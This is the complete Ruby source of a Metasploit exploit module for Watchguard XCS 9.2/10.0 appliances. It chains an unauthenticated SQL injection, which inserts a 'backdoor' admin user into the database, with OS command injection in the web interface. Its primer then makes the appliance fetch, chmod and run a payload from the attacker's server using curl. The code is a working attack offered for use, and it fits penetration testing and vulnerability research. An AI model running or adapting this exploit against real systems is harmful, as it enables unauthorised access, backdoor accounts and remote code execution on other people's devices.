Watchguard XCS Remote Command Execution

`##  
# This module requires Metasploit: http://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
  
require 'msf/core'  
  
class Metasploit4 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::Remote::HttpServer  
include Msf::Exploit::EXE  
include Msf::Exploit::FileDropper  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Watchguard XCS Remote Command Execution',  
'Description' => %q{  
This module exploits two separate vulnerabilities found in the Watchguard XCS virtual  
appliance to gain command execution. By exploiting an unauthenticated SQL injection, a  
remote attacker may insert a valid web user into the appliance database, and get access  
to the web interface. On the other hand, a vulnerability in the web interface allows the  
attacker to inject operating system commands as the 'nobody' user.  
},  
'Author' =>  
[  
'Daniel Jensen <daniel.jensen[at]security-assessment.com>' # discovery and Metasploit module  
],  
'License' => MSF_LICENSE,  
'References' =>  
[  
['URL', 'http://security-assessment.com/files/documents/advisory/Watchguard-XCS-final.pdf']  
],  
'Platform' => 'bsd',  
'Arch' => ARCH_X86_64,  
'Privileged' => false,  
'Stance' => Msf::Exploit::Stance::Aggressive,  
'Targets' =>  
[  
[ 'Watchguard XCS 9.2/10.0', { }]  
],  
'DefaultOptions' =>  
{  
'SSL' => true  
},  
'DefaultTarget' => 0,  
'DisclosureDate' => 'Jun 29 2015'  
))  
  
register_options(  
[  
OptString.new('TARGETURI', [true, 'The target URI', '/']),  
OptString.new('WATCHGUARD_USER', [true, 'Web interface user account to add', 'backdoor']),  
OptString.new('WATCHGUARD_PASSWORD', [true, 'Web interface user password', 'backdoor']),  
OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10]),  
Opt::RPORT(443)  
],  
self.class  
)  
end  
  
def check  
#Check to see if the SQLi is present  
res = send_request_cgi({  
'uri' => normalize_uri(target_uri.path, '/borderpost/imp/compose.php3'),  
'cookie' => "sid=1'"  
})  
  
if res && res.body && res.body.include?('unterminated quoted string')  
return Exploit::CheckCode::Vulnerable  
end  
  
Exploit::CheckCode::Safe  
end  
  
  
def exploit  
# Get a valid session by logging in or exploiting SQLi to add user  
print_status('Getting a valid session...')  
@sid = get_session  
print_status('Successfully logged in')  
  
# Check if cmd injection works  
test_cmd_inj = send_cmd_exec('/ADMIN/mailqueue.spl', 'id')  
unless test_cmd_inj && test_cmd_inj.body.include?('uid=65534')  
fail_with(Failure::UnexpectedReply, 'Could not inject command, may not be vulnerable')  
end  
  
# We have cmd exec, stand up an HTTP server and deliver the payload  
vprint_status('Getting ready to drop binary on appliance')  
  
@elf_sent = false  
# Generate payload  
@pl = generate_payload_exe  
  
if @pl.nil?  
fail_with(Failure::BadConfig, 'Please select a native bsd payload')  
end  
  
# Start the server and use primer to trigger fetching and running of the payload  
begin  
Timeout.timeout(datastore['HTTPDELAY']) { super }  
rescue Timeout::Error  
end  
end  
  
def attempt_login(username, pwd_clear)  
#Attempts to login with the provided user credentials  
#Get the login page  
get_login_hash = send_request_cgi({  
'uri' => normalize_uri(target_uri.path, '/login.spl')  
})  
  
unless get_login_hash && get_login_hash.body  
fail_with(Failure::Unreachable, 'Could not get login page.')  
end  
  
#Find the hash token needed to login  
login_hash = ''  
get_login_hash.body.each_line do |line|  
next if line !~ /name="hash" value="(.*)"/  
login_hash = $1  
break  
end  
  
sid_cookie = (get_login_hash.get_cookies || '').scan(/sid=(\w+);/).flatten[0] || ''  
if login_hash == '' || sid_cookie == ''  
fail_with(Failure::UnexpectedReply, 'Could not find login hash or cookie')  
end  
  
login_post = {  
'u' => "#{username}",  
'pwd' => "#{pwd_clear}",  
'hash' => login_hash,  
'login' => 'Login'  
}  
print_status('Attempting to login with provided credentials')  
login = send_request_cgi({  
'uri' => normalize_uri(target_uri.path, '/login.spl'),  
'method' => 'POST',  
'encode_params' => false,  
'cookie' => "sid=#{sid_cookie}",  
'vars_post' => login_post,  
'vars_get' => {  
'f' => 'V'  
}  
})  
  
  
unless login && login.body && login.body.include?('<title>Loading...</title>')  
return nil  
end  
  
sid_cookie  
end  
  
def add_user(user_id, username, pwd_hash, pwd_clear)  
#Adds a user to the database using the unauthed SQLi  
res = send_request_cgi({  
'uri' => normalize_uri(target_uri.path, '/borderpost/imp/compose.php3'),  
'cookie' => "sid=1%3BINSERT INTO sds_users (self, login, password, org, priv_level, quota, disk_usage) VALUES(#{user_id}, '#{username}', '#{pwd_hash}', 0, 'server_admin', 0, 0)--"  
})  
  
unless res && res.body  
fail_with(Failure::Unreachable, "Could not connect to host")  
end  
  
if res.body.include?('ERROR: duplicate key value violates unique constraint')  
print_status("Added backdoor user, credentials => #{username}:#{pwd_clear}")  
else  
fail_with(Failure::UnexpectedReply, 'Unable to add user to database')  
end  
  
true  
end  
  
def generate_device_hash(cleartext_password)  
#Generates the specific hashes needed for the XCS  
pre_salt = 'BorderWare '  
post_salt = ' some other random (9) stuff'  
hash_tmp = Rex::Text.md5(pre_salt + cleartext_password + post_salt)  
final_hash = Rex::Text.md5(cleartext_password + hash_tmp)  
  
final_hash  
end  
  
def send_cmd_exec(uri, os_cmd, blocking = true)  
#This is a handler function that makes HTTP calls to exploit the command injection issue  
unless @sid  
fail_with(Failure::Unknown, 'Missing a session cookie when attempting to execute command.')  
end  
  
opts = {  
'uri' => normalize_uri(target_uri.path, "#{uri}"),  
'cookie' => "sid=#{@sid}",  
'encode_params' => true,  
'vars_get' => {  
'f' => 'dnld',  
'id' => ";#{os_cmd}"  
}  
}  
  
if blocking  
res = send_request_cgi(opts)  
else  
res = send_request_cgi(opts, 1)  
end  
  
#Handle cmd exec failures  
if res.nil? && blocking  
fail_with(Failure::Unknown, 'Failed to exploit command injection.')  
end  
  
res  
end  
  
def get_session  
#Gets a valid login session, either valid creds or the SQLi vulnerability  
username = datastore['WATCHGUARD_USER']  
pwd_clear = datastore['WATCHGUARD_PASSWORD']  
user_id = rand(999)  
  
sid_cookie = attempt_login(username, pwd_clear)  
  
return sid_cookie unless sid_cookie.nil?  
  
vprint_error('Failed to login, attempting to add backdoor user...')  
pwd_hash = generate_device_hash(pwd_clear)  
  
unless add_user(user_id, username, pwd_hash, pwd_clear)  
fail_with(Failure::Unknown, 'Failed to add user account to database.')  
end  
  
sid_cookie = attempt_login(username, pwd_clear)  
  
unless sid_cookie  
fail_with(Failure::Unknown, 'Unable to login with user account.')  
end  
  
sid_cookie  
end  
  
# Make the server download the payload and run it  
def primer  
vprint_status('Primer hook called, make the server get and run exploit')  
  
#Gets the autogenerated uri from the mixin  
payload_uri = get_uri  
  
filename = rand_text_alpha_lower(8)  
print_status("Sending download request for #{payload_uri}")  
  
download_cmd = "/usr/local/sbin/curl -k #{payload_uri} -o /tmp/#{filename}"  
vprint_status("Telling appliance to run #{download_cmd}")  
send_cmd_exec('/ADMIN/mailqueue.spl', download_cmd)  
register_file_for_cleanup("/tmp/#{filename}")  
  
chmod_cmd = "chmod +x /tmp/#{filename}"  
vprint_status('Chmoding the payload...')  
send_cmd_exec("/ADMIN/mailqueue.spl", chmod_cmd)  
  
exec_cmd = "/tmp/#{filename}"  
vprint_status('Running the payload...')  
send_cmd_exec('/ADMIN/mailqueue.spl', exec_cmd, false)  
  
vprint_status('Finished primer hook, raising Timeout::Error manually')  
raise(Timeout::Error)  
end  
  
#Handle incoming requests from the server  
def on_request_uri(cli, request)  
vprint_status("on_request_uri called: #{request.inspect}")  
print_status('Sending the payload to the server...')  
@elf_sent = true  
send_response(cli, @pl)  
end  
  
end  
`